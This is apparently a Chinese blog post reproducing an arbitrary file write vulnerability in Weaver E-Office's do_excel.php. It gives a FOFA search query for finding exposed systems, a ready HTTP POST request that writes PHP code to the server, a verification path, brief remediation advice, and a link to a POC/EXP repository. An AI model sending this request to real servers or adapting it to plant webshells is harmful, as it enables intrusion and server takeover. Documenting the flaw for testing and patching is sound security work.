【漏洞复现】泛微OA E-Office do_excel.php 任意文件写入漏洞

》》》产品描述《《《

泛微0-0fice是一款标准化的协同 OA办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。


》》》漏洞描述《《《

泛微OAE-Ofice do exce.php 口存在任意文件写入漏洞。由于该接口未对上传文件的路径和名称进行有效校验,攻击者可以通过构造特定的请求,将任意文件写入到服务器的指定位置。攻击者利用该漏洞上传恶意文件,如 WebShel 或系统脚本,从而在服务器上执行任意命令,访问敏感数据,甚至完全接管服务器。此漏洞严重威胁系统安全,可导致数据泄露、权限提升以及业务系统瘫痪等严重后果。


》》》搜索语句《《《

app="泛微-EOffice"



》》》漏洞复现《《《

Matlab 复制代码
POST /general/charge/charge_list/do_excel.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Content-Length: 44
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

html=<?php echo md5("1");unlink(__FILE__);?>

测试文件地址:/general/charge/charge list/excel.php

如果能解析php代码则存在漏洞


》》》修复建议《《《

1、如非必要,禁止公网访问该系统。

2、通过防火墙等安全设备设置访问策略,设置白名单访问。

3、升级产品到最新版本


-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

更多最新0day/1day POC&EXP移步----->Kelichen1113/POC-EXP (github.com)****

-------------------------------------------------------------------------------------------------------------------------

-------------------------------------------------------------------------------------------------------------------------

相关推荐
black0moonlight1 小时前
ISAAC Gym 7. 使用箭头进行数据可视化
开发语言·python
时光の尘1 小时前
C语言菜鸟入门·关键字·int的用法
c语言·开发语言·数据结构·c++·单片机·链表·c
坊钰1 小时前
【Java 数据结构】时间和空间复杂度
java·开发语言·数据结构·学习·算法
Edward-tan1 小时前
c语言数据结构与算法--简单实现线性表(顺序表+链表)的插入与删除
c语言·开发语言·链表
武昌库里写JAVA2 小时前
一文读懂Redis6的--bigkeys选项源码以及redis-bigkey-online项目介绍
c语言·开发语言·数据结构·算法·二维数组
苹果酱05672 小时前
windows安装redis, 修改自启动的redis服务的密码
java·开发语言·spring boot·mysql·中间件
蒟蒻的贤2 小时前
vue11.22
开发语言·前端·javascript
程序员与背包客_CoderZ3 小时前
C++设计模式——Abstract Factory Pattern抽象工厂模式
c语言·开发语言·c++·设计模式·抽象工厂模式
Mike_188702783513 小时前
深入探索Golang的GMP调度机制:源码解析与实现原理
开发语言·后端·golang
SoraLuna3 小时前
「Mac玩转仓颉内测版32」基础篇12 - Cangjie中的变量操作与类型管理
开发语言·算法·macos·cangjie